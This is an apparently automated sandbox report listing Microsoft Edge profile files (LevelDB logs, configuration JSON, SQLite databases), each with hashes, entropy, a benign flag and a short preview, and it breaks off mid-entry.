                                                                                                                                                                                                                                                                                                                                    SHA1:168C6A8FEB4EA64A595754E3D03B81EB1FC3ED3E
                                                                                                                                                                                                                                                                                                                                    SHA-256:C6A9CACA815922DB1D6E43C5B66440D69C40C9F8B5B066824F23511DFF5EA20F
                                                                                                                                                                                                                                                                                                                                    SHA-512:0E944CADA035E304D1CEA8462E6079EDE7506DA183E800A63E8B46D2A78FD468A64D49B7B12A8D2C33148F6A0C87F85EBCAA1D05A58708EA66C0167D2C21C50C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1_...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380108392127901..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):311
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.160540170210654
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56fK63ERM1923oH+Tcwtk2WwnvB2KLlr6fXN44q2P923oH+Tcwtk2WwnvIFUv:ofKbRhYebkxwnvFLQftv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                                                    MD5:5236292368FDF3B59EA1ED3F94987FBD
                                                                                                                                                                                                                                                                                                                                    SHA1:C99F97B815B183877107D08B0810B8760E67F868
                                                                                                                                                                                                                                                                                                                                    SHA-256:D53E547DCB57C2EB5739F4ACFB2045A8DF558364F33D516B62BB06EE9BC34343
                                                                                                                                                                                                                                                                                                                                    SHA-512:386EF1B6B663E4E1C0735F60EAF839C326B85A6275F46DAB4996FF8D1EEF1B4345524AD0B169ABEF92769495AA20A700E6110BBF3F85D528DB4E9F541A9AA3FC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:31.368 1d04 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/31-03:46:31.428 1d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                    Size (bytes):358860
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324614908411503
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RP:C1gAg1zfvX
                                                                                                                                                                                                                                                                                                                                    MD5:9EBC6A244E4DD886D9A7E2AF70D85FC3
                                                                                                                                                                                                                                                                                                                                    SHA1:93D280B141A4E46B2833E74FD280782BF948BCD3
                                                                                                                                                                                                                                                                                                                                    SHA-256:FC53F5E0DFC1E0A244B431B265209B8CA87B1147C00DF954F1A2D88FAB59BBF7
                                                                                                                                                                                                                                                                                                                                    SHA-512:0FD7B306A44DECC467F62E76BD5B903A6F0E7D3C5356E7373CDE70F0E832D2FB442B67F9100ADC1A928EC4BB99677BD60C5FBB5C1C24B979EC2A05913567DCC4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.199162640461256
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eL1L+q2P923oH+Tcwt8aPrqIFUt8M6f9e91Zmw+M6f9erLVkwO923oH+TcwC:ofYL4v4YebL3FUt8xfY91/+xfYd5LYeo
                                                                                                                                                                                                                                                                                                                                    MD5:D544522322E85DA16057D9FBA3B63C2F
                                                                                                                                                                                                                                                                                                                                    SHA1:F98F7AEB973C45F64E794107194E2B823B814F79
                                                                                                                                                                                                                                                                                                                                    SHA-256:71425788E4EEFEA8198E312A6555928E34BBA83BBCABD95973DEFBAB8CEC866D
                                                                                                                                                                                                                                                                                                                                    SHA-512:0B2F2E520FF09FF11A05E23DD6B2ECE96D984DEECEE044BD446742387F9F6BA8A098FD8BE4FB891058FDAE348AC26B320F04FD4FEBC49427897E214329E064E1
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.750 7a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/31-03:46:25.824 7a8 Recovering log #3.2024/12/31-03:46:25.824 7a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.199162640461256
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eL1L+q2P923oH+Tcwt8aPrqIFUt8M6f9e91Zmw+M6f9erLVkwO923oH+TcwC:ofYL4v4YebL3FUt8xfY91/+xfYd5LYeo
                                                                                                                                                                                                                                                                                                                                    MD5:D544522322E85DA16057D9FBA3B63C2F
                                                                                                                                                                                                                                                                                                                                    SHA1:F98F7AEB973C45F64E794107194E2B823B814F79
                                                                                                                                                                                                                                                                                                                                    SHA-256:71425788E4EEFEA8198E312A6555928E34BBA83BBCABD95973DEFBAB8CEC866D
                                                                                                                                                                                                                                                                                                                                    SHA-512:0B2F2E520FF09FF11A05E23DD6B2ECE96D984DEECEE044BD446742387F9F6BA8A098FD8BE4FB891058FDAE348AC26B320F04FD4FEBC49427897E214329E064E1
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.750 7a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/31-03:46:25.824 7a8 Recovering log #3.2024/12/31-03:46:25.824 7a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238797765865682
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eq3lL+q2P923oH+Tcwt865IFUt8M6f9eeHj1Zmw+M6f9esLVkwO923oH+Tc4:ofYyIv4Yeb/WFUt8xfY01/+xfY85LYev
                                                                                                                                                                                                                                                                                                                                    MD5:7206634C0EC82F9CD57B7FEA9961CEA9
                                                                                                                                                                                                                                                                                                                                    SHA1:3319E3A3D2EF22D271940C85F485D9280EBF51CF
                                                                                                                                                                                                                                                                                                                                    SHA-256:495CDD66AF969E72BEB75A22BCC5343D3507748B8AD41B04F986E0D7E94A90C5
                                                                                                                                                                                                                                                                                                                                    SHA-512:552A1460A51A62F5D7D6F6697FC9822FCB2FC6B04E6743570A85B54EF1DFD16F3ACC6635FBB8586DD606EB18C7EE41F338A58C11D7DC63F9062664A8192A99F2
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.894 7a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/31-03:46:25.915 7a8 Recovering log #3.2024/12/31-03:46:25.931 7a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238797765865682
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eq3lL+q2P923oH+Tcwt865IFUt8M6f9eeHj1Zmw+M6f9esLVkwO923oH+Tc4:ofYyIv4Yeb/WFUt8xfY01/+xfY85LYev
                                                                                                                                                                                                                                                                                                                                    MD5:7206634C0EC82F9CD57B7FEA9961CEA9
                                                                                                                                                                                                                                                                                                                                    SHA1:3319E3A3D2EF22D271940C85F485D9280EBF51CF
                                                                                                                                                                                                                                                                                                                                    SHA-256:495CDD66AF969E72BEB75A22BCC5343D3507748B8AD41B04F986E0D7E94A90C5
                                                                                                                                                                                                                                                                                                                                    SHA-512:552A1460A51A62F5D7D6F6697FC9822FCB2FC6B04E6743570A85B54EF1DFD16F3ACC6635FBB8586DD606EB18C7EE41F338A58C11D7DC63F9062664A8192A99F2
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.894 7a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/31-03:46:25.915 7a8 Recovering log #3.2024/12/31-03:46:25.931 7a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1254
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                                    MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                                    SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                                    SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                                    SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.220144683462287
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9mDq2P923oH+Tcwt8NIFUt8M6f9VF3XZmw+M6f9VF3FkwO923oH+Tcwt8+eLJ:ofav4YebpFUt8xfzdX/+xfzdF5LYebqJ
                                                                                                                                                                                                                                                                                                                                    MD5:645EBA19E1981651234A5E20F0ED5B2F
                                                                                                                                                                                                                                                                                                                                    SHA1:4F504006A3A670233A096AAC5ADBA1FDE8C48E0C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4CC64D01CA0F7BAE4BC3020C31E90925BC4A8DEEC0634039E67A7DB8371AB680
                                                                                                                                                                                                                                                                                                                                    SHA-512:3FF5F0822DEAC5A74E3339C25FA0C2D7383CD530E7155CC15618F504F54D10F15F250F9D9EC719365245AEAD3A5314867A6AB2FC358CC5B15D7DAF0C1BC9B650
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.569 b80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/31-03:46:26.570 b80 Recovering log #3.2024/12/31-03:46:26.570 b80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.220144683462287
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9mDq2P923oH+Tcwt8NIFUt8M6f9VF3XZmw+M6f9VF3FkwO923oH+Tcwt8+eLJ:ofav4YebpFUt8xfzdX/+xfzdF5LYebqJ
                                                                                                                                                                                                                                                                                                                                    MD5:645EBA19E1981651234A5E20F0ED5B2F
                                                                                                                                                                                                                                                                                                                                    SHA1:4F504006A3A670233A096AAC5ADBA1FDE8C48E0C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4CC64D01CA0F7BAE4BC3020C31E90925BC4A8DEEC0634039E67A7DB8371AB680
                                                                                                                                                                                                                                                                                                                                    SHA-512:3FF5F0822DEAC5A74E3339C25FA0C2D7383CD530E7155CC15618F504F54D10F15F250F9D9EC719365245AEAD3A5314867A6AB2FC358CC5B15D7DAF0C1BC9B650
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.569 b80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/31-03:46:26.570 b80 Recovering log #3.2024/12/31-03:46:26.570 b80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6481262007522295
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:aj9P0LEcAjlrP/KbtpQkQerE773pL9hCgam6ItRKToaAu:adyKlrP/se2E7Pv9RKcC
                                                                                                                                                                                                                                                                                                                                    MD5:DF0D2FCFE368ECEEB78C13B004DAEDBD
                                                                                                                                                                                                                                                                                                                                    SHA1:1E9121546F3F0758130C2A37F274C56BCE00B702
                                                                                                                                                                                                                                                                                                                                    SHA-256:91ED1A0AB9A23419FBD76C4A2435EDC1CCBAB5FC481528342F34159558CA8ABB
                                                                                                                                                                                                                                                                                                                                    SHA-512:13179A41D9084C4778EFD801A91E2D18B87C5BA662BF08170564DEB9742BD0F93B00D538413B6E6A8D38171E7EFC190E17EAB09C3B396835FC02E9F6A2E5E474
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274146150925307
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:ofE79+v4Yeb8rcHEZrELFUt8xfE7J/+xfEg9V5LYeb8rcHEZrEZSJ:W4Yeb8nZrExg89LYeb8nZrEZe
